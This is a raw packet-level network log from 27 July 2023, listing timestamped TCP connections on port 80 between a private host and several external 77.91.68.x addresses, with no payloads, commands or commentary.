Jul 27, 2023 01:33:03.475724936 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.475724936 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.475744963 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.475775003 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:03.475775957 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.475775957 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.475871086 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.475888968 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:03.538459063 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:05.074830055 CEST	49726	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.075748920 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.118999004 CEST	80	49726	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.119136095 CEST	49726	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.119952917 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.120040894 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.129043102 CEST	49726	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.132884979 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.173144102 CEST	80	49726	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.176944017 CEST	80	49726	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.177170038 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.178277969 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.178394079 CEST	49726	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.178448915 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.220284939 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.264904976 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.264944077 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.264969110 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.264991999 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.265001059 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.265028954 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.265038013 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.265053034 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.265067101 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.265091896 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.265101910 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.265122890 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.265136003 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.265144110 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.265155077 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.265177011 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.265198946 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.265209913 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.265214920 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.265275002 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.265289068 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.300405025 CEST	49726	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.301184893 CEST	49728	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.309492111 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.309561014 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.309586048 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.309609890 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.309645891 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.309660912 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.309701920 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.309794903 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.309813976 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.309827089 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.309854984 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.309865952 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.309896946 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.309925079 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.309945107 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.310008049 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.310039997 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.310069084 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.344425917 CEST	80	49726	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.344504118 CEST	49726	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.345419884 CEST	80	49728	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.345498085 CEST	49728	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.346261024 CEST	49728	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.354048014 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.354087114 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.354125977 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.354131937 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.354149103 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.354173899 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.354197979 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.354211092 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.354211092 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.354223967 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.354238033 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.354260921 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.354281902 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.354290009 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.354296923 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.354305983 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.354321003 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.354336023 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.354351044 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.354371071 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.390604019 CEST	80	49728	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.394104004 CEST	80	49728	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.396797895 CEST	49728	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.398574114 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.398611069 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.398638010 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.398709059 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.398735046 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.398760080 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.398776054 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.398806095 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.398833036 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.398857117 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.398883104 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.398889065 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.398905039 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.398921013 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.398942947 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.398950100 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.398968935 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.398979902 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.399004936 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.399023056 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.399030924 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.399055958 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.399061918 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.399127960 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.443068027 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.443218946 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.443255901 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.443279982 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.443305969 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.443346977 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.443396091 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.443396091 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.443490028 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.443511963 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.443522930 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.443541050 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.443552971 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.443576097 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.443594933 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.443605900 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.443625927 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.443625927 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.443638086 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.443655968 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.443666935 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.443713903 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.443713903 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.487690926 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.487737894 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.487766981 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.487788916 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.487858057 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.487858057 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.487941980 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.487941980 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.487953901 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.487976074 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.488002062 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.488023043 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.488040924 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.488053083 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.488060951 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.488060951 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.488084078 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.488101006 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.488112926 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.488135099 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.488156080 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.488156080 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.488166094 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.488183022 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.488765001 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.525959969 CEST	49728	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.526786089 CEST	49729	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.532324076 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.532371044 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.532401085 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.532418966 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.532442093 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.532526970 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.532560110 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.532574892 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.532597065 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.533004045 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.570852041 CEST	80	49728	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.571351051 CEST	80	49729	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.571857929 CEST	49728	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.571933985 CEST	49729	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.574759960 CEST	49729	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.620306015 CEST	80	49729	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.624429941 CEST	80	49729	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.624898911 CEST	49729	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.739435911 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.739444017 CEST	49729	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.746176958 CEST	49730	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.785618067 CEST	80	49729	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.785770893 CEST	80	49727	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.785815001 CEST	49729	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.786237955 CEST	49727	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.792654037 CEST	80	49730	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.793344021 CEST	49730	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.846432924 CEST	49730	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:05.892226934 CEST	80	49730	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.897316933 CEST	80	49730	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:05.898581982 CEST	49730	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.014264107 CEST	49730	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.015117884 CEST	49731	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.060713053 CEST	80	49730	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:06.060796976 CEST	80	49731	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:06.060940981 CEST	49730	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.060945034 CEST	49731	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.061439991 CEST	49731	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.105401039 CEST	80	49731	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:06.110831976 CEST	80	49731	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:06.110986948 CEST	49731	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.217314005 CEST	49731	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.218398094 CEST	49732	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.261485100 CEST	80	49731	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:06.262887001 CEST	80	49732	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:06.263067007 CEST	49732	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.263073921 CEST	49731	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.263926029 CEST	49732	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.308546066 CEST	80	49732	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:06.313858032 CEST	80	49732	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:06.314022064 CEST	49732	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.420501947 CEST	49732	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.421471119 CEST	49733	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.467430115 CEST	80	49732	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:06.467488050 CEST	80	49733	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:06.467580080 CEST	49732	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.467670918 CEST	49733	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.485443115 CEST	49733	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.530926943 CEST	80	49733	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:06.536987066 CEST	80	49733	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:06.540960073 CEST	49733	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.671911001 CEST	49733	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.672673941 CEST	49734	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.716975927 CEST	80	49734	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:06.717088938 CEST	49734	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.717391014 CEST	80	49733	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:06.717513084 CEST	49733	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.718375921 CEST	49734	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.763348103 CEST	80	49734	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:06.769049883 CEST	80	49734	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:06.770107985 CEST	49734	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.921474934 CEST	49734	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.923527002 CEST	49735	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.965775967 CEST	80	49734	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:06.968364000 CEST	49734	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.968966007 CEST	80	49735	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:06.969456911 CEST	49735	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:06.972616911 CEST	49735	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:07.017532110 CEST	80	49735	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:07.021028042 CEST	80	49735	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:07.022895098 CEST	49735	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:07.151482105 CEST	49735	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:07.196434021 CEST	80	49735	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:07.197058916 CEST	49735	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:07.304970026 CEST	49736	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:07.350682974 CEST	80	49736	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:07.350977898 CEST	49736	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:07.352034092 CEST	49736	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:07.396496058 CEST	80	49736	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:07.399960041 CEST	80	49736	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:07.400808096 CEST	49736	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:07.454771042 CEST	80	49724	77.91.68.29	192.168.2.5
Jul 27, 2023 01:33:07.454885960 CEST	49724	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:07.563290119 CEST	49736	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:07.578320026 CEST	49737	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:07.607791901 CEST	80	49736	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:07.607870102 CEST	49736	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:07.622766018 CEST	80	49737	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:07.624593973 CEST	49737	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:07.624593973 CEST	49737	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:07.653037071 CEST	49724	80	192.168.2.5	77.91.68.29
Jul 27, 2023 01:33:07.669142962 CEST	80	49737	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:07.674230099 CEST	80	49737	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:07.674333096 CEST	49737	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:07.697856903 CEST	80	49724	77.91.68.29	192.168.2.5
Jul 27, 2023 01:33:07.782572031 CEST	49737	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:07.783737898 CEST	49738	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:07.827495098 CEST	80	49737	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:07.827692032 CEST	49737	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:07.828373909 CEST	80	49738	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:07.829839945 CEST	49738	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:07.831768990 CEST	49738	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:07.876091003 CEST	80	49738	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:07.880043983 CEST	80	49738	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:07.880232096 CEST	49738	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:07.998797894 CEST	80	49725	77.91.68.248	192.168.2.5
Jul 27, 2023 01:33:07.998871088 CEST	49738	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:07.999150991 CEST	49725	80	192.168.2.5	77.91.68.248
Jul 27, 2023 01:33:07.999151945 CEST	49739	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.043354988 CEST	80	49738	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:08.043443918 CEST	80	49739	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:08.043540001 CEST	49738	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.043664932 CEST	49739	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.050254107 CEST	49739	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.094688892 CEST	80	49739	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:08.098673105 CEST	80	49739	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:08.098800898 CEST	49739	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.259130001 CEST	49739	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.260066032 CEST	49740	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.307265997 CEST	80	49739	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:08.307317019 CEST	80	49740	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:08.307354927 CEST	49739	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.307523012 CEST	49740	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.307898045 CEST	49740	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.356456041 CEST	80	49740	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:08.359451056 CEST	80	49740	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:08.359563112 CEST	49740	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.483067989 CEST	49740	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.483436108 CEST	49741	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.527858019 CEST	80	49740	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:08.527910948 CEST	80	49741	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:08.528099060 CEST	49741	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.528100967 CEST	49740	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.528673887 CEST	49741	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.573215008 CEST	80	49741	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:08.577079058 CEST	80	49741	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:08.579094887 CEST	49741	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.714401960 CEST	49741	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.720180035 CEST	49742	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.759181976 CEST	80	49741	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:08.762767076 CEST	49741	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.765625000 CEST	80	49742	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:08.765763998 CEST	49742	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.766648054 CEST	49742	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.812769890 CEST	80	49742	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:08.816169024 CEST	80	49742	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:08.817678928 CEST	49742	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.942042112 CEST	49742	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.942956924 CEST	49743	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.987024069 CEST	80	49742	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:08.987068892 CEST	80	49743	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:08.987102032 CEST	49742	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.987159967 CEST	49743	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:08.989274979 CEST	49743	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:33:09.037177086 CEST	80	49743	77.91.68.61	192.168.2.5
Jul 27, 2023 01:33:09.041162968 CEST	80	49743	77.91.68.61	192.168.2.5
